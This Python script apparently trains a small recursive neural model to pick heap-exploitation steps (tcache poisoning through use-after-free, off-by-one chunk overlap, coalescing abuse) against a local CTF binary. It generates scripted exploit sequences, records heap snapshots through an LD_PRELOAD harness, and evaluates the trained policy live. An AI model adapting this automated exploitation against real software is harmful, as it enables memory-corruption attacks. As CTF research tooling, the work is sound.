| |
| """ |
| multi_technique.py - Train one model on multiple exploit techniques. |
| |
| Techniques: |
| 1. Tcache poison (UAF fd corruption): M+ F F W_UAF M+ |
| 2. Off-by-one overlap (null byte overflow): M M M W_OVF F M |
| 3. Coalesce abuse (free adjacent, alloc large): M M M F F M_large |
| |
| Action space (4 ops): |
| 0: MALLOC |
| 1: FREE |
| 2: WRITE_UAF (edit freed chunk - corrupt fd pointer) |
| 3: WRITE_OVERFLOW (edit allocated chunk with max data - triggers off-by-one) |
| |
| The model must learn WHICH technique to apply based on heap state. |
| """ |
|
|
| import sys |
| import os |
| import json |
| import subprocess |
| import tempfile |
| import time |
| import random |
| import re |
| import numpy as np |
| import torch |
| import torch.nn.functional as F |
| from pathlib import Path |
|
|
| ROOT = Path(__file__).resolve().parent.parent |
| sys.path.insert(0, str(ROOT / "agent")) |
| sys.path.insert(0, str(ROOT / "model")) |
|
|
| from universal_grid import UniversalGridEncoder |
| from trm_heap import RMSNorm, SwiGLU, RecursionBlock |
|
|
BINARY = ROOT / "ctf" / "vuln_heap"                  # vulnerable target binary
HARNESS = ROOT / "harness" / "heapgrid_harness.so"   # LD_PRELOAD heap-state dumper
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")

# Action space — must stay in sync with the module docstring and generators.
OP_MALLOC = 0
OP_FREE = 1
OP_WRITE_UAF = 2   # edit a freed chunk (used to corrupt the tcache fd)
OP_WRITE_OVF = 3   # full-length edit of an allocated chunk (off-by-one trigger)
N_OPS = 4
# Request sizes offered to the policy; 0x78 is the size gen_off_by_one uses.
SIZES = [0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x78, 0x80]
|
|
|
|
class MultiTechTRM(torch.nn.Module):
    """Recursive reasoning model scoring the 4 heap ops for a grid state.

    Two recursion blocks refine latent states (z, y): n_outer outer steps,
    each running n_inner inner refinements of z before updating y once.
    The refined y is mean-pooled and projected to N_OPS logits.
    """

    def __init__(self, vocab_size=64, hidden_dim=128, seq_len=512,
                 n_outer=2, n_inner=3):
        super().__init__()
        init_scale = 0.02
        # NOTE: module/parameter creation order is kept stable so seeded
        # initialization reproduces the same RNG stream.
        self.embed = torch.nn.Embedding(vocab_size, hidden_dim)
        self.y_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * init_scale)
        self.z_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * init_scale)
        self.block_z = RecursionBlock(hidden_dim)
        self.block_y = RecursionBlock(hidden_dim)
        self.pos_embed = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * init_scale)
        self.out_norm = RMSNorm(hidden_dim)
        self.n_outer = n_outer
        self.n_inner = n_inner
        self.head = torch.nn.Linear(hidden_dim, N_OPS)

    def forward(self, x):
        """Map an integer grid batch (B, ...) to op logits of shape (B, N_OPS)."""
        batch = x.shape[0]
        ctx = self.embed(x.reshape(batch, -1)) + self.pos_embed
        y = self.y_init.expand(batch, -1, -1)
        z = self.z_init.expand(batch, -1, -1)
        for _ in range(self.n_outer):
            # z is refined repeatedly against the context; y updates once per outer step.
            for _ in range(self.n_inner):
                z = z + self.block_z(ctx + y + z)
            y = y + self.block_y(y + z)
        pooled = self.out_norm(y).mean(dim=1)
        return self.head(pooled)
|
|
|
|
def run_and_dump(commands):
    """Run the vulnerable binary under the harness and collect heap snapshots.

    The commands are fed to the binary's stdin (with a trailing "5" menu
    choice to exit).  The LD_PRELOAD harness writes one JSON snapshot per
    heap operation to HEAPGRID_OUT; those lines are parsed and returned.

    Returns a list of snapshot dicts (possibly empty on failure/timeout).
    """
    # tempfile.mkstemp instead of the deprecated, race-prone tempfile.mktemp.
    fd, dump_path = tempfile.mkstemp(suffix=".jsonl")
    os.close(fd)
    env = os.environ.copy()
    env["LD_PRELOAD"] = str(HARNESS)
    env["HEAPGRID_OUT"] = dump_path
    states = []
    try:
        try:
            subprocess.run(
                [str(BINARY)],
                input=("\n".join(commands) + "\n5\n").encode(),
                env=env, capture_output=True, timeout=10,
            )
        except subprocess.TimeoutExpired:
            # A hung target must not abort data collection; parse what we got.
            pass
        if os.path.exists(dump_path):
            with open(dump_path) as f:
                for line in f:
                    line = line.strip()
                    if line:
                        states.append(json.loads(line))
    finally:
        # Always remove the dump, even if the run or the parse raised.
        if os.path.exists(dump_path):
            os.unlink(dump_path)
    return states
|
|
|
|
| |
| |
| |
| |
|
|
def gen_tcache_poison(n_pre=None):
    """Emit a tcache-poison exploit script: M+ F F W_UAF M+.

    Returns (commands, labels, technique_name) where commands are the raw
    stdin lines for the binary and labels the matching op classes.
    """
    size = random.choice([s for s in SIZES if s <= 0x70])
    slots = random.sample(range(16), 8)
    if n_pre is None:
        n_pre = random.randint(2, 5)

    commands = []
    labels = []
    alloc_slots = []
    # Prime the heap with n_pre same-size allocations.
    for slot in slots[:n_pre]:
        commands.append(f"1 {slot} {size}")
        labels.append(OP_MALLOC)
        alloc_slots.append(slot)

    # Free two of them so the tcache bin holds a short chain.
    targets = random.sample(alloc_slots, 2)
    for slot in targets:
        commands.append(f"4 {slot}")
        labels.append(OP_FREE)

    # UAF write into the most recently freed chunk corrupts its fd pointer.
    commands.append(f"2 {targets[1]} {'41' * 8}")
    labels.append(OP_WRITE_UAF)

    # Drain the poisoned bin with fresh same-size allocations.
    for slot in [s for s in slots if s not in alloc_slots][:2]:
        commands.append(f"1 {slot} {size}")
        labels.append(OP_MALLOC)

    return commands, labels, "tcache_poison"
|
|
|
|
| |
| |
| |
| |
| |
|
|
def gen_off_by_one():
    """Emit an off-by-one overlap script: M M M W_OVF F M.

    Returns (commands, labels, technique_name).
    """
    size = 0x78
    slots = random.sample(range(16), 6)

    commands = []
    labels = []

    # Three allocations of the null-byte-overflow-friendly size.
    for slot in slots[:3]:
        commands.append(f"1 {slot} {size}")
        labels.append(OP_MALLOC)

    # Completely fill the first chunk — the max-length edit triggers the
    # off-by-one into the neighbouring chunk header.
    commands.append(f"2 {slots[0]} {'41' * size}")
    labels.append(OP_WRITE_OVF)

    # Free the clobbered neighbour ...
    commands.append(f"4 {slots[1]}")
    labels.append(OP_FREE)

    # ... then reallocate to obtain the overlapping chunk.
    commands.append(f"1 {slots[3]} {size}")
    labels.append(OP_MALLOC)

    return commands, labels, "off_by_one"
|
|
|
|
| |
| |
| |
| |
|
|
def gen_coalesce():
    """Emit a coalesce-abuse script: M M M F F M_large.

    Returns (commands, labels, technique_name).
    """
    small = random.choice([0x30, 0x40, 0x50])
    slots = random.sample(range(16), 7)

    commands = []
    labels = []
    n_pre = random.randint(3, 5)

    # Several small allocations laid out back to back.
    for slot in slots[:n_pre]:
        commands.append(f"1 {slot} {small}")
        labels.append(OP_MALLOC)

    # Free two adjacent chunks so the allocator can merge them.
    for slot in (slots[1], slots[2]):
        commands.append(f"4 {slot}")
        labels.append(OP_FREE)

    # A larger request should be served from the coalesced region,
    # capped at the maximum supported size.
    big = min(small * 2 + 0x10, 0x80)
    commands.append(f"1 {slots[n_pre]} {big}")
    labels.append(OP_MALLOC)

    return commands, labels, "coalesce"
|
|
|
|
| |
| |
| |
|
|
def gen_benign():
    """Emit a harmless malloc/free sequence (negative training examples).

    Returns (commands, labels, technique_name).
    """
    n_ops = random.randint(4, 12)
    commands = []
    labels = []
    allocated = {}
    for _ in range(n_ops):
        # Bias toward allocation; must allocate when nothing is live.
        # (Short-circuit keeps the RNG stream identical when empty.)
        if not allocated or random.random() < 0.55:
            open_slots = [s for s in range(16) if s not in allocated]
            if not open_slots:
                break
            slot = random.choice(open_slots)
            size = random.choice(SIZES)
            commands.append(f"1 {slot} {size}")
            labels.append(OP_MALLOC)
            allocated[slot] = size
        else:
            slot = random.choice(list(allocated))
            commands.append(f"4 {slot}")
            labels.append(OP_FREE)
            allocated.pop(slot)
    return commands, labels, "benign"
|
|
|
|
| |
| |
| |
|
|
def collect_data(n_per_technique=200, n_benign=300):
    """Generate labeled (grid, op) training data across all techniques.

    For each technique a scripted exploit is executed against the real
    binary; the per-operation heap snapshots are encoded to grids and each
    snapshot is labeled with the op the policy *should* take at that point
    of the exploit (heuristic relabeling from the observed heap state).

    Parameters:
        n_per_technique: episodes per exploit technique.
        n_benign: episodes of benign malloc/free traffic.

    Returns (X, y): X is a stacked int grid array, y is int64 labels.
    """
    all_grids, all_labels = [], []
    technique_counts = {}

    generators = [
        ("tcache_poison", gen_tcache_poison, n_per_technique),
        ("off_by_one", gen_off_by_one, n_per_technique),
        ("coalesce", gen_coalesce, n_per_technique),
        ("benign", gen_benign, n_benign),
    ]

    for tech_name, gen_fn, count in generators:
        print(f"  Generating {count} {tech_name}...")
        n_ok = 0
        for _ in range(count):
            # All generators share the same call signature, so no special
            # casing per technique is needed (the old if/else branches were
            # identical).  The generator's own labels are unused: labels are
            # re-derived from observed state below.
            commands, _op_labels, _ = gen_fn()

            states = run_and_dump(commands)
            if len(states) < 2:
                continue

            # Fresh encoder per episode: it accumulates action history.
            encoder = UniversalGridEncoder()

            n_free_seen = 0
            write_done = False

            for j, state in enumerate(states):
                op = state.get("operation", "malloc")
                if "free" in op.lower():
                    n_free_seen += 1

                chunks = state.get("chunks", [])
                n_alloc = sum(1 for c in chunks if c.get("state") == 1)

                if tech_name == "tcache_poison":
                    # Allocate first, free two, UAF-write once, then drain.
                    if n_free_seen == 0:
                        label = OP_FREE if (n_alloc >= 2 and j >= len(states) * 0.3) else OP_MALLOC
                    elif n_free_seen >= 2 and not write_done:
                        label = OP_WRITE_UAF
                        write_done = True
                    else:
                        label = OP_MALLOC

                elif tech_name == "off_by_one":
                    # Overflow once after 3 allocs, free a neighbour, realloc.
                    if n_alloc >= 3 and n_free_seen == 0 and not write_done:
                        label = OP_WRITE_OVF
                        write_done = True
                    elif write_done and n_free_seen == 0:
                        label = OP_FREE
                    else:
                        label = OP_MALLOC

                elif tech_name == "coalesce":
                    # Two frees back-to-back, then (large) allocations.
                    if (n_free_seen == 0 and n_alloc >= 3) or n_free_seen == 1:
                        label = OP_FREE
                    else:
                        label = OP_MALLOC

                else:
                    # Benign: teach the operation that actually came next.
                    if j + 1 < len(states):
                        next_op = states[j + 1].get("operation", "malloc")
                        label = OP_FREE if "free" in next_op.lower() else OP_MALLOC
                    else:
                        label = OP_MALLOC

                grid = encoder.encode(state)
                all_grids.append(grid)
                all_labels.append(label)

                # Feed the op that actually happened back into the encoder
                # so its action history matches the real trace.
                actual_op = OP_FREE if "free" in op.lower() else OP_MALLOC
                encoder.record_action(actual_op, state.get("target_size", 0))

            n_ok += 1

        technique_counts[tech_name] = n_ok

    print(f"  Technique counts: {technique_counts}")
    return np.stack(all_grids), np.array(all_labels, dtype=np.int64)
|
|
|
|
def train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128):
    """Train the model with shuffled minibatches, AdamW, and cosine LR decay.

    Logs average loss and full-epoch accuracy on the first epoch and then
    every 25 epochs.  Trains in place; returns nothing.
    """
    model.to(DEVICE)
    opt = torch.optim.AdamW(model.parameters(), lr=lr, weight_decay=0.01)
    sched = torch.optim.lr_scheduler.CosineAnnealingLR(opt, T_max=epochs)
    inputs = torch.from_numpy(X).long().to(DEVICE)
    targets = torch.from_numpy(y).long().to(DEVICE)
    n_samples = len(inputs)

    for epoch in range(1, epochs + 1):
        model.train()
        order = torch.randperm(n_samples, device=DEVICE)
        running_loss = 0.0
        n_correct = 0
        n_batches = 0
        for start in range(0, n_samples, bs):
            batch = order[start:start + bs]
            logits = model(inputs[batch])
            loss = F.cross_entropy(logits, targets[batch])
            opt.zero_grad()
            loss.backward()
            # Clip gradients to keep the recursive updates stable.
            torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
            opt.step()
            running_loss += loss.item()
            n_correct += (logits.argmax(1) == targets[batch]).sum().item()
            n_batches += 1
        sched.step()
        if epoch == 1 or epoch % 25 == 0:
            print(f"  Epoch {epoch:3d} | loss={running_loss/n_batches:.4f} | acc={n_correct/n_samples:.3f}")
|
|
|
|
def evaluate_live(model, n_trials=50, temperature=0.3):
    """Evaluate with hybrid policy: TRM picks op, rules handle W timing.

    Runs the live binary n_trials times.  Each step samples an op from the
    model's temperature-softened distribution, with guard rules that veto
    writes lacking a valid target.  Commands are streamed to the process;
    the harness dump is polled for the latest heap state.

    Returns a dict with counts of landed UAF writes ("uaf"), overflow
    writes ("ovf"), recognizably correct exploit sequences ("correct_seq"),
    and the raw per-trial op strings ("seqs").
    """
    model.eval().to(DEVICE)
    results = {"uaf": 0, "ovf": 0, "correct_seq": 0, "seqs": []}

    for _ in range(n_trials):
        # mkstemp instead of the deprecated, race-prone tempfile.mktemp.
        fd, dump_path = tempfile.mkstemp(suffix=".jsonl")
        os.close(fd)
        env = os.environ.copy()
        env["LD_PRELOAD"] = str(HARNESS)
        env["HEAPGRID_OUT"] = dump_path
        proc = subprocess.Popen([str(BINARY)], stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)

        encoder = UniversalGridEncoder()
        slots, freed, ops = {}, set(), []
        did_uaf = did_ovf = False

        for _step in range(20):
            time.sleep(0.01)  # give the harness a moment to flush the dump
            state = {"chunks": []}
            try:
                with open(dump_path) as f:
                    lines = f.readlines()
                if lines:
                    state = json.loads(lines[-1].strip())
            except (OSError, json.JSONDecodeError):
                # Dump missing or mid-write; fall back to the empty state.
                pass

            grid = encoder.encode(state)
            x = torch.from_numpy(grid).long().unsqueeze(0).to(DEVICE)
            with torch.no_grad():
                logits = model(x)
                probs = F.softmax(logits / temperature, dim=1)
                op = torch.multinomial(probs, 1).item()

            # Guard rules: a write op needs a valid target or it degrades to malloc.
            if op == OP_WRITE_UAF and not freed:
                op = OP_MALLOC
            if op == OP_WRITE_OVF and not any(slots.values()):
                op = OP_MALLOC

            open_slots = [s for s in range(8) if s not in slots]
            live_slots = [s for s, v in slots.items() if v and s not in freed]

            cmd = None
            size = 0
            if op == OP_MALLOC and open_slots:
                s = random.choice(open_slots)
                size = random.choice(SIZES)
                cmd = f"1 {s} {size}"
                slots[s] = True
                ops.append("M")
            elif op == OP_FREE and live_slots:
                s = random.choice(live_slots)
                cmd = f"4 {s}"
                slots[s] = False
                freed.add(s)
                ops.append("F")
            elif op == OP_WRITE_UAF and freed:
                s = random.choice(list(freed))
                cmd = f"2 {s} {'41' * 8}"
                did_uaf = True
                ops.append("U")
            elif op == OP_WRITE_OVF and live_slots:
                s = random.choice(live_slots)
                # Always write the maximum 0x78 bytes to force the off-by-one.
                cmd = f"2 {s} {'41' * 0x78}"
                did_ovf = True
                ops.append("O")
            else:
                ops.append("x")  # sampled op had no valid target this step

            if cmd:
                try:
                    proc.stdin.write((cmd + "\n").encode())
                    proc.stdin.flush()
                except BrokenPipeError:
                    break  # target crashed; stop issuing commands
                encoder.record_action(op, size)

        try:
            proc.stdin.write(b"5\n")
            proc.stdin.flush()
            proc.wait(timeout=2)
        except (OSError, subprocess.TimeoutExpired):
            proc.kill()

        # Count the UAF only if the 0x41-pattern actually landed in an fd.
        if did_uaf:
            try:
                with open(dump_path) as f:
                    landed = False
                    for line in f:
                        st = json.loads(line.strip())
                        for c in st.get("chunks", []):
                            if c.get("fd", 0) == 0x4141414141414141:
                                landed = True
                                break
                        if landed:
                            break
                if landed:
                    results["uaf"] += 1
            except (OSError, json.JSONDecodeError):
                pass

        if did_ovf:
            results["ovf"] += 1

        seq = "".join(ops)
        # A trial counts as "correct" if its compacted sequence matches any
        # of the three technique shapes (skips removed).
        compact = seq.replace("x", "")
        if (re.search(r"M+F+U", compact)
                or re.search(r"M+OF+M", compact)
                or re.search(r"M+FF+M", compact)):
            results["correct_seq"] += 1

        results["seqs"].append(seq)
        if os.path.exists(dump_path):
            os.unlink(dump_path)

    return results
|
|
|
|
def main():
    """Collect data, train the multi-technique TRM, and evaluate it live."""
    print(f"Device: {DEVICE}")

    print("\n=== Collecting multi-technique data ===")
    X, y = collect_data(n_per_technique=300, n_benign=300)
    print(f"Data: {len(X)} samples | M={sum(y==0)} F={sum(y==1)} U={sum(y==2)} O={sum(y==3)}")

    print("\n=== Training on GPU ===")
    model = MultiTechTRM(hidden_dim=128, n_outer=2, n_inner=3)
    print(f"Params: {sum(p.numel() for p in model.parameters()):,}")
    train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128)

    # Derive the trial count once; the old code hard-coded "50" and "*2"
    # in every report line, which silently breaks if n_trials changes.
    n_trials = 50
    print(f"\n=== Live evaluation ({n_trials} trials) ===")
    results = evaluate_live(model, n_trials=n_trials, temperature=0.3)

    def _pct(key):
        # Format "count/total (pct%)" from the results dict.
        return f"{results[key]}/{n_trials} ({100.0 * results[key] / n_trials:.0f}%)"

    print(f"UAF writes achieved: {_pct('uaf')}")
    print(f"Overflow writes: {_pct('ovf')}")
    print(f"Valid exploit sequences: {_pct('correct_seq')}")
    print("\nOp distribution in sequences:")
    all_ops = "".join(results["seqs"])
    for ch, name in [("M", "malloc"), ("F", "free"), ("U", "uaf_write"),
                     ("O", "overflow"), ("x", "skip")]:
        print(f"  {name}: {all_ops.count(ch)}")
    print("\nSample sequences:")
    for s in results["seqs"][:15]:
        print(f"  {s}")

    print("\nPer-technique breakdown:")
    has_uaf = sum(1 for s in results["seqs"] if "U" in s)
    has_ovf = sum(1 for s in results["seqs"] if "O" in s)
    has_both = sum(1 for s in results["seqs"] if "U" in s and "O" in s)
    neither = sum(1 for s in results["seqs"] if "U" not in s and "O" not in s)
    print(f"  Used tcache poison (U): {has_uaf}/{n_trials}")
    print(f"  Used off-by-one (O): {has_ovf}/{n_trials}")
    print(f"  Used both: {has_both}/{n_trials}")
    print(f"  Used neither: {neither}/{n_trials}")




if __name__ == "__main__":
    main()
|
|